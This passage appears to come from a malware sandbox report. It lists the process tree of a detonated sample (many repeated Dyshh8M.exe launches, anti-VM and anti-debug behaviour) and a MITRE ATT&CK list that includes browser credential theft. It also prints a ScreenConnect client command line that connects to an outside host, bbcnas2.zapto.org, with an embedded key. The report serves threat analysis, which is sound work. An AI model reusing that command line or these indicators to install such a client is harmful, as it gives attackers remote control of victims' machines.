      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12248
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12256
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12280
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11840
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9224
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12300
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12324
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12332
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12364
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12412
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12420
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12476
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12492
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12500
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12508
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12516
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12524
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12532
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12540
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12548
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12556
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12564
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12572
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12580
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12596
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12604
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12612
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12628
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12636
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12644
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12660
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12668
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12716
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2292
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5052 -ip 5052
1⤵
PID:4444

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E3213FFB1A357C6A15C81E8620715731 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240677796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4064
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:3096
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A4FEEDD031CC30D4F90BF1C26AE2F8CC
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4400
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A67D321E4B6058891C34D4762151165D E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:32

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:3000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "9a4b1c52-2179-481d-a289-7d44e903e96d" "User"
  2⤵
  - Executes dropped EXE
  PID:992
- C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "b4abed41-d6fe-40e4-9266-e92554889e94" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion